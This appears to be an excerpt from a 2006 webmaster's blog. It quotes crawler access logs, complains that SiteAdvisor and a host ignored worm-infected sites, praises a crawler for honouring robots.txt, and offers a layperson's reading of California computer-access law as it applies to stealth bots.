216.182.236.241 [domU-12-31-34-00-00-B9.usma2.compute.amazonaws.com.] "Java/1.5.0_09"

216.182.236.142 [domU-12-31-34-00-01-1E.usma2.compute.amazonaws.com.] "Java/1.5.0_09"

216.182.236.177 [domU-12-31-34-00-00-F9.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.236.110 [domU-12-31-34-00-00-2A.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.236.167 [domU-12-31-34-00-01-07.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.233.105 [domU-12-31-34-00-01-D3.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.230.187 [domU-12-31-33-00-03-55.usma1.compute.amazonaws.com.] "Java/1.5.0_09"

216.182.237.9 [domU-12-31-34-00-01-B5.usma2.compute.amazonaws.com.] "Java/1.5.0_09"
It makes me weep for the future when a big web conglomerate, one that has a name that is synonymous with buying things online, one that should know better, starts to slide down that slippery slope of being a bad netizen.

Signed,
Get A. Clue

SiteAdvisor and ThePlanet Must Not Care

There were several hits on my blog post about SiteAdvisor from Network Associates, which owns McAfee SiteAdvisor, yet nothing changed. Wouldn't you assume that after reading my posts about SiteAdvisor green-lighting sites with worms in them, someone would at least change the site status to protect people?

Nope.

Funny, Symantec's Norton AntiVirus agrees with me that the site has a worm, but SiteAdvisor says you're good to visit.



Maybe they don't think it's a threat because McAfee AV products don't detect this worm?

Who knows, I'll stick with Norton AV.

Then again, we have ThePlanet, which hosts these sites; they were notified 6 days ago that this problem existed on 4 of their servers, and these sites are still online and functional.

I guess nobody cares about security these days.

Tuesday, November 28, 2006

BDFetch Plays By The Rules

Normally I'm always slamming corporate bots, but when one company, like brandimensions, appears to be playing by all the rules, I feel they should get a little praise.

Here's what their access attempts look like:

209.167.50.22 "GET /robots.txt HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 "GET /somepage.html HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 "GET /robots.txt HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 "GET /somepage.html HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 "GET /robots.txt HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 "GET /somepage.html HTTP/1.1" "www.brandimensions.com" "BDFetch"
At least they asked for robots.txt and appear to only go in when allowed.

However, they had a couple of bumps that I'd like to see them fix.

1. Ask for robots.txt once or twice a day, maybe once an hour worst case, not on every access.

2. Set your reverse DNS to say bdfetch.brandimensions.com or something similar so we can verify it's really your company and not someone spoofing you.

3. Include a link to a page about your crawler in the user agent, and a version number, such as "BDFetch/1.0 +http://www.brandimensions.com/crawler.html"

Other than those minor glitches, kudos for at least trying to play by the rules and at least giving webmasters the choice to allow you to crawl or not.

Nicely done.

Legality of Stealth Robots, Are They Trespassing?

What is the legality of a stealth robot, are they doing anything wrong?

Take a look at "Computer Hacking and Unauthorized Access Laws" and you'll see there's a quagmire of various laws, but the topic most relevant to this discussion is "unauthorized access", which basically covers trespassing onto a computer, theoretically even if that service is a public web server, since the laws don't specify that the server or service has to be private.

I'm no lawyer, so this obviously isn't valid legal advice, just my musings over the content of the California law, particularly the definitions in 502.c:

(c) Except as provided in subdivision (h), any person who commits any of the following acts is guilty of a public offense:

(1) Knowingly accesses and without permission alters, damages, deletes, destroys, or otherwise uses any data, computer, computer system, or computer network in order to either (A) devise or execute any scheme or artifice to defraud, deceive, or extort, or (B) wrongfully control or obtain money, property, or data.

(3) Knowingly and without permission uses or causes to be used computer services.
Let's examine what these transparent stealth crawlers do and see if it fits the definition.

First, the people using stealth crawlers know that if they use a real user agent like "Bob's Bot 1.0" it will expose their presence and they will be blocked. To avoid this they mask their presence, which obviously falls under "knowingly accesses and without permission" when they get to the content on a web site that is attempting to block their trespass.

Second, after they have gained access they "wrongfully control or obtain ..., property, or data" and do with it as they please: republish it without permission, use it to compile reports, etc. So I think we've covered two aspects here.

Even if the act itself causes relatively little harm, there is still a potential for penalty.
(3) Knowingly and without permission uses or causes to be used computer services.

(A) For the first violation which does not result in injury, and where the value of the computer services used does not exceed four hundred dollars ($400), by a fine not exceeding five thousand dollars ($5,000), or by imprisonment in the county jail not exceeding one year, or by both that fine and imprisonment.
The obvious way for a crawler to be technically "legal" is to simply identify itself by an obviously unique name like "Bob's Bot 1.0" and stop trying to convince the web server that it is Internet Explorer or Firefox in order to gain access.

I'd be curious what some legal minds might think about this interpretation of these laws for this particular application.